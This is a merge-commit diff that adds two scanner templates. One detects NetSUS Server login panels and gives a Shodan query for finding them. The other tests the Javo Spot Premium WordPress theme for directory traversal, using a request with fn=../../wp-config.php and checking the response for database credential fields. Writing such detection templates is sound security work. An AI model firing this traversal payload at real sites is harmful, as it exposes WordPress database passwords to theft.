Merge pull request #3676 from DhiyaneshGeek/master

NetSUS Server Login Panel , Javo Spot Premium Theme - Unauthenticated Directory Traversal

exposed-panels/netsus-server-login.yaml

@@ -0,0 +1,24 @@
+id: netsus-server-login
+
+info:
+  name: NetSUS Server Login Panel
+  author: dhiyaneshDK
+  severity: info
+  metadata:
+    shodan-query: 'http.title:"NetSUS Server Login"'
+  tags: panel,netsus,login
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/webadmin/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>NetSUS Server Login</title>'
+
+      - type: status
+        status:
+          - 200

vulnerabilities/wordpress/wp-spot-premium-lfi.yaml

@@ -0,0 +1,28 @@
+id: wp-spot-premium-lfi
+info:
+  name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
+  author: dhiyaneshDk
+  severity: high
+  description: The remote WordPress Java Spot Premium Theme has the `wp-config` file remotely accessible and its content available for reading.
+  reference:
+    - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
+    - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
+  tags: wordpress,backup
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200